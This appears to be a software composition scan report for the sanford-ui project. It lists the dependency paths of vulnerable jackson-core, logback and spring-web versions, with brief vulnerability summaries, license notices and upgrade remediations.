  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-accordion-flow@25.1.1 com.vaadin:vaadin-details-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-messages-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-app-layout-flow@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-date-time-picker-flow@25.1.1 com.vaadin:vaadin-date-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-date-time-picker-flow@25.1.1 com.vaadin:vaadin-time-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-accordion-flow@25.1.1 com.vaadin:vaadin-details-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-messages-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-app-layout-flow@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-date-time-picker-flow@25.1.1 com.vaadin:vaadin-date-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-date-time-picker-flow@25.1.1 com.vaadin:vaadin-time-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4, org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 and others

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4, org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 and others

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-starter@4.1.0-M4 org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

low severity
new

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1, com.vaadin:vaadin-spring-boot-starter@25.1.1 and others

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-spring@25.1.1 org.springframework:spring-webmvc@7.0.6 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-spring@25.1.1 org.springframework:spring-websocket@7.0.6 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-http-converter@4.0.5 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-webmvc@4.0.5 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-openfeign-core@5.0.1 io.github.openfeign:feign-form-spring@13.6 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-webflux@4.1.0-M4 org.springframework.boot:spring-boot-web-server@4.1.0-M4 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-reactor-netty@4.1.0-M4 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-webflux@4.1.0-M4 org.springframework.boot:spring-boot-http-codec@4.1.0-M4 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-webflux@4.1.0-M4 org.springframework:spring-webflux@7.0.6 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-webmvc@4.0.5 org.springframework:spring-webmvc@7.0.6 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-webmvc@4.0.5 org.springframework.boot:spring-boot-http-converter@4.0.5 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-webmvc@4.0.5 org.springframework.boot:spring-boot-servlet@4.0.5 org.springframework:spring-web@7.0.3
    Remediation: Upgrade to com.vaadin:vaadin-spring-boot-starter@25.1.1.
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-web-server@4.1.0-M4 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.0.5 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-tomcat@4.0.5 org.springframework.boot:spring-boot-web-server@4.1.0-M4 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.0.5 org.springframework.boot:spring-boot-web-server@4.1.0-M4 org.springframework:spring-web@7.0.3
